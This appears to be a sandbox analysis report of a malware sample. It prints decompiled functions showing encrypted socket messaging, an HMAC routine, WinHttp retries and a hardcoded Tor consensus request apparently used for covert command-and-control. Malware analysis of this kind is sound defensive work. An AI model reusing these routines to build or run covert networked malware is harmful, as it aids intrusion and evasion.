      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D56CF, Relevance: 7.6, APIs: 5, Instructions: 133network
    C-Code - Quality: 31%
    			E003D56CF(intOrPtr* __eax, void* __ecx, void* __eflags, void* _a4) {
				void* _v8;
				void* _v12;
				char _v32;
				void _v148;
				void* __esi;
				short _t42;
				short _t43;
				short _t44;
				void* _t60;
				void _t61;
				intOrPtr* _t74;
				void* _t76;
				signed int _t77;
				intOrPtr* _t87;
				void* _t95;
				void* _t97;
				void* _t98;

				_t76 = __ecx;
				_t74 = __eax;
				_t95 =  *0x3e8538(0x200);
				_v8 = _t95;
				_v12 =  *0x3e8538(0x200);
				memset(_t95, 0, 0x1fd);
				 *_t95 = 0x21;
				_t42 = E003DE937(_t76);
				_t87 = __imp__#9;
				 *((short*)(_t74 + 0x138)) = _t42;
				_t43 =  *_t87(_t42);
				 *((short*)(_t95 + 3)) = _t43;
				_t44 =  *_t87(0x14);
				_t77 = 5;
				 *((short*)(_t95 + 9)) = _t44;
				_t6 = _t95 + 0xb; // 0xb
				memcpy(_t6, _a4, _t77 << 2);
				_t97 = _t74 + 8;
				 *0x3e899c(_t97, _v8, 0x1fd);
				memcpy( &_v148, _t97, 0 << 2);
				 *0x3e8ab0( &_v148,  &_v32, 0x1d);
				_t98 = _v12;
				 *((intOrPtr*)(_v8 + 5)) = _v32;
				memset(_t98, 0, 0x200);
				if(E003D3BB7(_t74 + 0xf0, _v8, 0x1fd, _t98 + 3, _t74 + 0x110, _t74 + 0x120) == 0) {
					L7:
					 *0x3e8540(_v8);
					 *0x3e8540(_t98);
					_t60 = 0;
				} else {
					_t61 =  *(_t74 + 4) & 0x0000ffff;
					__imp__#9(_t61);
					 *_t98 = _t61;
					 *((char*)(_t98 + 2)) = 3;
					if(E003DFD0B( *_t74, _t98, 0x200) != 0x200) {
						goto L7;
					} else {
						if(E003DFB73( *_t74, _v8, 0x200) != 0x200 ||  *((char*)(_v8 + 2)) != 3 || E003D3BB7(_t74 + 0x100, _v8 + 3, 0x1fd, _v12, _t74 + 0x124, _t74 + 0x134) == 0 ||  *_v12 != 0x27) {
							_t98 = _v12;
							goto L7;
						} else {
							 *0x3e8540(_v8);
							 *0x3e8540(_v12);
							_t60 = 1;
						}
					}
				}
				return _t60;
			}




















    0x003d56cf
    0x003d56e1
    0x003d56e9
    0x003d56ec
    0x003d56fd
    0x003d5700
    0x003d5708
    0x003d570b
    0x003d5710
    0x003d5717
    0x003d571e
    0x003d5722
    0x003d5726
    0x003d572a
    0x003d572b
    0x003d572f
    0x003d573d
    0x003d573f
    0x003d5743
    0x003d575d
    0x003d575f
    0x003d576b
    0x003d5777
    0x003d577a
    0x003d57aa
    0x003d5823
    0x003d5826
    0x003d582d
    0x003d5833
    0x003d57ac
    0x003d57ac
    0x003d57b1
    0x003d57b8
    0x003d57bb
    0x003d57cc
    0x00000000
    0x003d57ce
    0x003d57dd
    0x003d5820
    0x00000000
    0x003d5837
    0x003d583a
    0x003d5843
    0x003d584b
    0x003d584b
    0x003d57dd
    0x003d57cc
    0x003d5852

    APIs
    • memset.MSVCRT ref: 003D5700
    • htons.WS2_32(00000000), ref: 003D571E
    • htons.WS2_32(00000014), ref: 003D5726
    • memset.MSVCRT ref: 003D577A
      • Part of subcall function 003D3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003D3BCF
      • Part of subcall function 003D3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003D3C60
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3C71
      • Part of subcall function 003D3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003D3D87
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DD2
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3DF2
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DFD
    • htons.WS2_32(?), ref: 003D57B1
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFDE5
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFE15
      • Part of subcall function 003DFD0B: memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DFD0B: htons.WS2_32(00000301), ref: 003DFEB9
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFEC2
      • Part of subcall function 003DFD0B: send.WS2_32(?,?,?,00000000), ref: 003DFED4
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBB0
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBC9
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBD8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBED
      • Part of subcall function 003DFB73: htons.WS2_32(?), ref: 003DFC25
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCA2
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCB8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCD6
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003DEC77, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85
    C-Code - Quality: 22%
    			E003DEC77(void* _a4, int _a8, intOrPtr _a12, intOrPtr _a16, void* _a20) {
				void _v24;
				void _v44;
				void _v108;
				void _v172;
				char _v288;
				void* _t46;
				signed int _t70;
				void* _t74;
				void* _t82;
				void* _t86;

				memset( &_v108, 0, 0x40);
				memset( &_v172, 0, 0x40);
				memcpy( &_v108, _a4, _a8);
				memcpy( &_v172, _a4, _a8);
				_t46 = 0;
				do {
					 *(_t86 + _t46 - 0x68) =  *(_t86 + _t46 - 0x68) ^ 0x00000036;
					 *(_t86 + _t46 - 0xa8) =  *(_t86 + _t46 - 0xa8) ^ 0x0000005c;
					_t46 = _t46 + 1;
				} while (_t46 < 0x40);
				 *0x3e8ab4( &_v288, _t74, _t82);
				 *0x3e899c( &_v288,  &_v108, 0x40);
				 *0x3e899c( &_v288, _a12, _a16);
				 *0x3e8ab0( &_v288,  &_v24);
				_t70 = 5;
				memcpy( &_v44,  &_v24, _t70 << 2);
				 *0x3e8ab4( &_v288);
				 *0x3e899c( &_v288,  &_v172, 0x40);
				 *0x3e899c( &_v288,  &_v44, 0x14);
				 *0x3e8ab0( &_v288,  &_v24);
				_push(5);
				return memcpy(_a20,  &_v24, 0 << 2);
			}













    0x003dec88
    0x003dec98
    0x003deca7
    0x003decb9
    0x003decc1
    0x003decc3
    0x003decc3
    0x003decc8
    0x003decd0
    0x003decd1
    0x003decdf
    0x003decf2
    0x003ded05
    0x003ded16
    0x003ded1e
    0x003ded2c
    0x003ded2e
    0x003ded44
    0x003ded57
    0x003ded68
    0x003ded71
    0x003ded7c

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D12C0, Relevance: 7.6, APIs: 5, Instructions: 74network
    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 003D12E2
    • gethostname.WS2_32(?,000000FF), ref: 003D1302
    • getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 003D1322
    • freeaddrinfo.WS2_32(00000000), ref: 003D1380
    • WSACleanup.WS2_32 ref: 003D1386
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C45F3, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 159
    C-Code - Quality: 96%
    			E003C45F3(intOrPtr* __ebx) {
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t71;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t91;
				intOrPtr _t99;
				signed int* _t100;
				intOrPtr* _t102;
				intOrPtr _t103;
				intOrPtr _t107;
				signed int _t111;
				intOrPtr _t114;
				intOrPtr _t118;
				signed int _t121;
				signed short* _t122;
				intOrPtr _t128;
				signed int _t136;
				signed int _t141;
				void* _t143;
				intOrPtr _t144;
				intOrPtr _t146;
				intOrPtr* _t147;
				void* _t148;
				void* _t150;
				void* _t151;

				_t102 = __ebx;
				do {
					_t61 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t61 + 0xac))))(0x3e8594);
					if( *(_t148 - 8) < 0) {
						L13:
						 *(_t148 - 8) = 0xffffffff;
						L14:
						_t63 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0xc4))))(0x3e8594);
						_t22 = _t148 - 8;
						 *_t22 =  *(_t148 - 8) + 1;
						if( *_t22 == 0) {
							_t144 =  *((intOrPtr*)(_t148 - 4));
							goto L37;
						}
						_t141 =  *(_t148 - 0x1c);
						_t144 = 0;
						do {
							_t81 = E003E1280(0, _t148 - 0x41c);
							_t151 = _t150 + 4;
							_push(0x1c);
							if(_t81 == 0) {
								L003CA47E();
								_t150 = _t151 + 4;
								__eflags = _t81;
								if(_t81 == 0) {
									L21:
									_t82 = 0;
									__eflags = 0;
									L22:
									 *((intOrPtr*)(_t148 - 0x10)) = _t82;
									_push(_t141);
									_push(_t148 - 0x41c);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t82 + 8))))() != 0) {
										 *((intOrPtr*)(_t148 - 4)) = _t144;
										__eflags = _t144 - 5;
										if(__eflags >= 0) {
											L32:
											_t111 =  *(_t148 - 0xc) + 1;
											 *(_t148 - 0xc) = _t111;
											if(_t111 > 0x4b0) {
												goto L38;
											}
											if(_t111 != (0x66666667 * _t111 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t111 >> 0x20 >> 2) + ((0x66666667 * _t111 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t111 >> 0x20 >> 2)) * 4 + (0x66666667 * _t111 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t111 >> 0x20 >> 2) + ((0x66666667 * _t111 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t111 >> 0x20 >> 2)) * 4) {
												_t91 =  *0x3e8628; // 0x622508
												 *((intOrPtr*)( *((intOrPtr*)(_t91 + 0xc8))))(0x3e8);
											} else {
												_t114 =  *0x3e8628; // 0x622508
												 *((intOrPtr*)( *((intOrPtr*)(_t114 + 0xc8))))(0xea60);
											}
											goto L37;
										}
										_t146 = 0;
										__eflags = 0;
										while(1) {
											__eflags = E003C90F0(_t102,  *((intOrPtr*)(_t102 + 0x18)), _t141, _t146, _t148 - 0x18,  *_t102,  *((intOrPtr*)(_t102 + 4)),  *((intOrPtr*)(_t102 + 8)),  *((intOrPtr*)(_t102 + 0xc)),  *((intOrPtr*)(_t102 + 0x10)),  *((intOrPtr*)(_t102 + 0x14)));
											if(__eflags != 0) {
												break;
											}
											_t118 =  *0x3e8628; // 0x622508
											 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0xc8))))(0x3e8);
											_t146 = _t146 + 1;
											__eflags = _t146 - 3;
											if(__eflags < 0) {
												continue;
											}
											 *((intOrPtr*)(_t148 - 4)) = _t146;
											L31:
											_t144 =  *((intOrPtr*)(_t148 - 4));
											goto L32;
										}
										 *((intOrPtr*)(_t148 - 4)) = 0;
										goto L31;
									}
									goto L23;
								}
								_t82 = E003E1D30(_t81);
								goto L22;
							}
							L003CA47E();
							_t150 = _t151 + 4;
							if(_t81 == 0) {
								goto L21;
							}
							_t82 = L003E1DC0(_t81);
							goto L22;
							L23:
							_t144 = _t144 + 1;
						} while (_t144 < 5);
						 *((intOrPtr*)(_t148 - 4)) = _t144;
						goto L32;
					}
					_t103 =  *((intOrPtr*)(_t102 + 0x18));
					_t99 =  *((intOrPtr*)(_t103 + 8));
					_t121 =  *(_t148 - 8);
					if(_t121 >=  *((intOrPtr*)(_t99 + 0x18))) {
						L12:
						_t102 =  *((intOrPtr*)(_t148 + 8));
						goto L13;
					}
					_t122 =  *( *((intOrPtr*)(_t99 + 0x1c)) + _t121 * 4);
					_t147 = 0x200;
					_t100 = _t148 - 0x41c;
					_t143 = 0;
					while(1) {
						_t11 = _t147 + 0x7ffffdfe; // 0x7ffffffe
						if(_t11 == 0) {
							break;
						}
						_t136 =  *_t122 & 0x0000ffff;
						if(_t136 == 0) {
							break;
						}
						 *_t100 = _t136;
						_t100 =  &(_t100[0]);
						_t122 =  &(_t122[1]);
						_t147 = _t147 - 1;
						if(_t147 != 0) {
							continue;
						}
						L9:
						_t100 = _t100 - 2;
						_t143 = 0x8007007a;
						L10:
						 *_t100 = 0;
						if(_t143 < 0) {
							goto L12;
						}
						_t102 =  *((intOrPtr*)(_t148 + 8));
						 *(_t148 - 0x1c) =  *( *((intOrPtr*)( *((intOrPtr*)(_t103 + 8)) + 0x20)) +  *(_t148 - 8) * 4) & 0x0000ffff;
						goto L14;
					}
					__eflags = _t147;
					if(__eflags != 0) {
						goto L10;
					}
					goto L9;
					L37:
				} while (_t144 > 0);
				L38:
				_t65 =  *_t102;
				if( *_t102 != 0) {
					E003CBB40(_t65);
					_t150 = _t150 + 4;
				}
				_t66 =  *((intOrPtr*)(_t102 + 4));
				if( *((intOrPtr*)(_t102 + 4)) != 0) {
					E003CBB40(_t66);
					_t150 = _t150 + 4;
				}
				_t67 =  *((intOrPtr*)(_t102 + 8));
				if( *((intOrPtr*)(_t102 + 8)) != 0) {
					E003CBB40(_t67);
					_t150 = _t150 + 4;
				}
				_t68 =  *((intOrPtr*)(_t102 + 0x10));
				if( *((intOrPtr*)(_t102 + 0x10)) != 0) {
					E003CBB40(_t68);
					_t150 = _t150 + 4;
				}
				_t69 =  *((intOrPtr*)(_t102 + 0xc));
				if( *((intOrPtr*)(_t102 + 0xc)) != 0) {
					E003CBB40(_t69);
					_t150 = _t150 + 4;
				}
				E003CBB40(_t102);
				_t71 =  *((intOrPtr*)(_t148 - 0x10));
				 *((intOrPtr*)(_t148 - 0x18)) = 0x3e32ec;
				if(_t71 != 0) {
					_push(_t71);
					L003C1CB0();
				}
				_t128 =  *0x3e8628; // 0x622508
				 *((intOrPtr*)( *((intOrPtr*)(_t128 + 0xac))))(0x3e8600);
				_t107 =  *0x3e8628; // 0x622508
				 *0x3e8618 =  *0x3e8618 - 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t107 + 0xc4))))(0x3e8600);
				return 0;
			}





























    0x003c45f3
    0x003c4600
    0x003c4600
    0x003c4610
    0x003c4616
    0x003c468d
    0x003c468d
    0x003c4694
    0x003c4694
    0x003c46a4
    0x003c46a6
    0x003c46a6
    0x003c46a9
    0x003c47c3
    0x00000000
    0x003c47c3
    0x003c46af
    0x003c46b2
    0x003c46b4
    0x003c46bb
    0x003c46c0
    0x003c46c3
    0x003c46c7
    0x003c46de
    0x003c46e3
    0x003c46e6
    0x003c46e8
    0x003c46f3
    0x003c46f3
    0x003c46f3
    0x003c46f5
    0x003c46f5
    0x003c46fd
    0x003c4704
    0x003c470b
    0x003c4718
    0x003c471b
    0x003c471e
    0x003c4771
    0x003c4774
    0x003c4775
    0x003c477e
    0x00000000
    0x00000000
    0x003c4798
    0x003c47af
    0x003c47bf
    0x003c479a
    0x003c479a
    0x003c47ab
    0x003c47ab
    0x00000000
    0x003c4798
    0x003c4720
    0x003c4720
    0x003c4722
    0x003c4745
    0x003c4747
    0x00000000
    0x00000000
    0x003c4749
    0x003c475a
    0x003c475c
    0x003c475d
    0x003c4760
    0x00000000
    0x00000000
    0x003c4762
    0x003c476e
    0x003c476e
    0x00000000
    0x003c476e
    0x003c4767
    0x00000000
    0x003c4767
    0x00000000
    0x003c470b
    0x003c46ec
    0x00000000
    0x003c46ec
    0x003c46c9
    0x003c46ce
    0x003c46d3
    0x00000000
    0x00000000
    0x003c46d7
    0x00000000
    0x003c470d
    0x003c470d
    0x003c470e
    0x003c4713
    0x00000000
    0x003c4713
    0x003c4618
    0x003c461b
    0x003c461e
    0x003c4624
    0x003c468a
    0x003c468a
    0x00000000
    0x003c468a
    0x003c4629
    0x003c462c
    0x003c4631
    0x003c4637
    0x003c4640
    0x003c4640
    0x003c4648
    0x00000000
    0x00000000
    0x003c464a
    0x003c4650
    0x00000000
    0x00000000
    0x003c4652
    0x003c4655
    0x003c4658
    0x003c465b
    0x003c465c
    0x00000000
    0x00000000
    0x003c4664
    0x003c4664
    0x003c4667
    0x003c466c
    0x003c466e
    0x003c4673
    0x00000000
    0x00000000
    0x003c4682
    0x003c4685
    0x00000000
    0x003c4685
    0x003c4660
    0x003c4662
    0x00000000
    0x00000000
    0x00000000
    0x003c47c6
    0x003c47c6
    0x003c47ce
    0x003c47ce
    0x003c47d4
    0x003c47d7
    0x003c47dc
    0x003c47dc
    0x003c47df
    0x003c47e4
    0x003c47e7
    0x003c47ec
    0x003c47ec
    0x003c47ef
    0x003c47f4
    0x003c47f7
    0x003c47fc
    0x003c47fc
    0x003c47ff
    0x003c4804
    0x003c4807
    0x003c480c
    0x003c480c
    0x003c480f
    0x003c4814
    0x003c4817
    0x003c481c
    0x003c481c
    0x003c4820
    0x003c4825
    0x003c482b
    0x003c4835
    0x003c4837
    0x003c4838
    0x003c483d
    0x003c4840
    0x003c4851
    0x003c4853
    0x003c4859
    0x003c486a
    0x003c4871

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003C46C9
    • ??2@YAPAXI@Z.MSVCRT ref: 003C46DE
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • ??3@YAXPAX@Z.MSVCRT ref: 003C4838
      • Part of subcall function 003E1D30: WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003E1D73
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CF850, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102
    C-Code - Quality: 94%
    			E003CF850(void* __ebx, void* __ecx) {
				intOrPtr _t29;
				intOrPtr _t34;
				void* _t47;
				intOrPtr _t51;
				intOrPtr _t55;
				void* _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				void* _t61;
				intOrPtr _t62;
				void* _t63;

				_t47 = __ebx;
				_t61 = __ecx;
				_t19 =  *((intOrPtr*)(__ecx + 0x14));
				if( *((intOrPtr*)(__ecx + 0x14)) != 0) {
					E003CBB40(_t19);
					_t63 = _t63 + 4;
				}
				_t20 =  *((intOrPtr*)(_t61 + 0x28));
				if( *((intOrPtr*)(_t61 + 0x28)) != 0) {
					E003CBB40(_t20);
					_t63 = _t63 + 4;
				}
				_t21 =  *((intOrPtr*)(_t61 + 0x1c));
				if( *((intOrPtr*)(_t61 + 0x1c)) != 0) {
					E003CBB40(_t21);
					_t63 = _t63 + 4;
				}
				_t22 =  *((intOrPtr*)(_t61 + 0x2c));
				if( *((intOrPtr*)(_t61 + 0x2c)) != 0) {
					E003CBB40(_t22);
					_t63 = _t63 + 4;
				}
				_t23 =  *((intOrPtr*)(_t61 + 0x20));
				if( *((intOrPtr*)(_t61 + 0x20)) != 0) {
					E003CBB40(_t23);
					_t63 = _t63 + 4;
				}
				_t24 =  *((intOrPtr*)(_t61 + 0x18));
				if( *((intOrPtr*)(_t61 + 0x18)) != 0) {
					E003CBB40(_t24);
					_t63 = _t63 + 4;
				}
				E003C16B0(_t61 + 0x30);
				_t26 =  *((intOrPtr*)(_t61 + 0x64));
				if( *((intOrPtr*)(_t61 + 0x64)) != 0) {
					E003CBB40(_t26);
					_t63 = _t63 + 4;
				}
				_t27 =  *((intOrPtr*)(_t61 + 0x5c));
				if( *((intOrPtr*)(_t61 + 0x5c)) != 0) {
					E003CBB40(_t27);
					_t63 = _t63 + 4;
				}
				_t28 =  *((intOrPtr*)(_t61 + 0x60));
				if( *((intOrPtr*)(_t61 + 0x60)) != 0) {
					E003CBB40(_t28);
					_t63 = _t63 + 4;
				}
				_t29 =  *0x3e8628; // 0x622508
				 *((intOrPtr*)( *((intOrPtr*)(_t29 + 0xac))))(0x3e8594, _t57);
				_t58 =  *((intOrPtr*)(_t61 + 4));
				if(_t58 != 0) {
					E003C6E10(_t47, _t58);
					_push(_t58);
					L003C1CB0();
					_t63 = _t63 + 4;
				}
				_t59 =  *((intOrPtr*)(_t61 + 0xc));
				if(_t59 != 0) {
					E003C6730(_t59);
					_push(_t59);
					L003C1CB0();
					_t63 = _t63 + 4;
				}
				_t55 =  *0x3e8628; // 0x622508
				 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0xc4))))(0x3e8594);
				 *((intOrPtr*)(_t61 + 0x4fc)) = 0x3e32ec;
				_t62 =  *((intOrPtr*)(_t61 + 0x504));
				if(_t62 != 0) {
					_push(_t62);
					L003C1CB0();
				}
				_t51 =  *0x3e8628; // 0x622508
				 *((intOrPtr*)( *((intOrPtr*)(_t51 + 0xac))))(0x3e8600);
				_t34 =  *0x3e8628; // 0x622508
				 *0x3e8618 =  *0x3e8618 - 1;
				return  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0xc4))))(0x3e8600);
			}














    0x003cf850
    0x003cf851
    0x003cf853
    0x003cf858
    0x003cf85b
    0x003cf860
    0x003cf860
    0x003cf863
    0x003cf868
    0x003cf86b
    0x003cf870
    0x003cf870
    0x003cf873
    0x003cf878
    0x003cf87b
    0x003cf880
    0x003cf880
    0x003cf883
    0x003cf888
    0x003cf88b
    0x003cf890
    0x003cf890
    0x003cf893
    0x003cf898
    0x003cf89b
    0x003cf8a0
    0x003cf8a0
    0x003cf8a3
    0x003cf8a8
    0x003cf8ab
    0x003cf8b0
    0x003cf8b0
    0x003cf8b6
    0x003cf8bb
    0x003cf8c0
    0x003cf8c3
    0x003cf8c8
    0x003cf8c8
    0x003cf8cb
    0x003cf8d0
    0x003cf8d3
    0x003cf8d8
    0x003cf8d8
    0x003cf8db
    0x003cf8e0
    0x003cf8e3
    0x003cf8e8
    0x003cf8e8
    0x003cf8eb
    0x003cf8fc
    0x003cf8fe
    0x003cf903
    0x003cf907
    0x003cf90c
    0x003cf90d
    0x003cf912
    0x003cf912
    0x003cf915
    0x003cf91a
    0x003cf91e
    0x003cf923
    0x003cf924
    0x003cf929
    0x003cf929
    0x003cf92c
    0x003cf93d
    0x003cf93f
    0x003cf949
    0x003cf952
    0x003cf954
    0x003cf955
    0x003cf95a
    0x003cf95d
    0x003cf96e
    0x003cf970
    0x003cf975
    0x003cf989

    APIs
      • Part of subcall function 003C16B0: memset.MSVCRT ref: 003C16EE
    • ??3@YAXPAX@Z.MSVCRT ref: 003CF955
      • Part of subcall function 003C6E10: ??3@YAXPAX@Z.MSVCRT ref: 003C6E42
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • ??3@YAXPAX@Z.MSVCRT ref: 003CF90D
    • ??3@YAXPAX@Z.MSVCRT ref: 003CF924
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D4FF4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74
    C-Code - Quality: 29%
    			E003D4FF4(intOrPtr __eax) {
				void* _t12;
				void* _t13;
				char* _t21;
				void* _t24;
				void* _t34;
				char* _t42;
				char* _t45;
				void* _t47;
				intOrPtr* _t49;

				_pop(_t34);
				 *((intOrPtr*)(_t49 + 0x20)) = __eax;
				_t52 = __eax;
				if(__eax == 0) {
					L7:
					_t12 = 0;
				} else {
					_t33 = _t49 + 0x20;
					_t13 = E003D4054(_t49 + 0x20, _t52);
					_t53 = _t13;
					if(_t13 == 0 || E003D3EE9(_t33, _t34, _t53) == 0) {
						L6:
						E003DFF10( *((intOrPtr*)(_t49 + 0x20)));
						goto L7;
					} else {
						 *((intOrPtr*)(_t49 + 0x14)) = 0x10;
						__imp__#5( *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x28)))), _t49 + 0x14, _t49 + 0xc);
						_t45 =  *0x3e8538(0x200);
						 *_t49 = 0x400000;
						_t21 =  *0x3e8538();
						_t42 = _t21;
						__imp__#12( *((intOrPtr*)(_t49 + 0x14)));
						sprintf(_t45, "GET /tor/status-vote/current/consensus-microdesc/14C131+27B6B5+49015F+585769+805509+D586D1+E8A9C4+ED03BB+EFCBE7.z HTTP/1.0\r\nHost: %s\r\n\r\n", _t21);
						_t24 = E003D4BDF(_t33, _t45, _t42,  *((intOrPtr*)(_t47 + 8)));
						_t49 = _t49 + 0x1c;
						if(_t24 == 0 || E003D4DC1(_t42) == 0) {
							 *0x3e8540(_t42);
							 *0x3e8540(_t45);
							goto L6;
						} else {
							 *0x3e8540(_t42);
							 *0x3e8540(_t45);
							E003DFF10( *((intOrPtr*)(_t49 + 0x24)));
							_t12 = 1;
							__eflags = 1;
						}
					}
				}
				return _t12;
			}












    0x003d4ff4
    0x003d4ff5
    0x003d4ff9
    0x003d4ffb
    0x003d50ae
    0x003d50ae
    0x003d5001
    0x003d5001
    0x003d5005
    0x003d500a
    0x003d500c
    0x003d50a5
    0x003d50a9
    0x00000000
    0x003d5021
    0x003d502f
    0x003d5039
    0x003d504a
    0x003d504c
    0x003d5053
    0x003d505e
    0x003d5060
    0x003d506d
    0x003d507e
    0x003d5083
    0x003d5088
    0x003d5096
    0x003d509e
    0x00000000
    0x003d50b2
    0x003d50b3
    0x003d50bb
    0x003d50c6
    0x003d50cd
    0x003d50cd
    0x003d50cd
    0x003d5088
    0x003d500c
    0x003d50d4

    APIs
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D40B3
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4122
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4165
      • Part of subcall function 003D4054: memset.MSVCRT ref: 003D41AC
      • Part of subcall function 003D4054: htonl.WS2_32(00000000), ref: 003D41C5
      • Part of subcall function 003D4054: getpeername.WS2_32(?,?,?), ref: 003D41EA
      • Part of subcall function 003D4054: memset.MSVCRT ref: 003D4226
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4233
    • getpeername.WS2_32(?), ref: 003D5039
    • inet_ntoa.WS2_32(?), ref: 003D5060
    • sprintf.MSVCRT ref: 003D506D
      • Part of subcall function 003D4BDF: memset.MSVCRT ref: 003D4C2D
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C61
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C80
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C90
      • Part of subcall function 003D4BDF: memset.MSVCRT ref: 003D4CA5
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4D4B
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4D68
      • Part of subcall function 003D4BDF: sscanf.MSVCRT ref: 003D4D70
      • Part of subcall function 003D4DC1: strtok.MSVCRT ref: 003D4E04
